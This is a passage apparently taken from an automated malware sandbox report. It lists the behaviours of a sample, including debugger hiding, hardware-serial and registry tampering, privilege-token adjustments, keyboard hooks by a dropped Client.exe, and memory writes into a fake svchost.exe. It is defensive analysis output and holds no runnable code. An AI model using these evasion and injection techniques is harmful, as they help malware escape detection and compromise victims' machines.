Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\System32\cmd.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\powercfg.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\Windows\system32\cmd.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGuid C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceType C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\Windows\System32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ContainerID C:\Windows\system32\wusa.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGuid C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 C:\Windows\system32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\LocationInformation C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Control C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\System32\Conhost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc C:\Windows\System32\Conhost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ClassGUID C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 C:\Windows\System32\Conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags C:\Windows\system32\conhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\Windows\system32\conhost.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 C:\Windows\system32\wusa.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service C:\Windows\system32\cmd.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29} C:\Windows\system32\powercfg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service C:\Windows\system32\powercfg.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\system32\powercfg.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ C:\Windows\System32\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80497100-8c73-48b9-aad9-ce387e19c56e}\0006 C:\Windows\System32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\wusa.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\cmd.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\System32\cmd.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Client.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4368 wrote to memory of 720 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4368 wrote to memory of 720 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 4368 wrote to memory of 2192 N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe C:\Windows\System32\cmd.exe
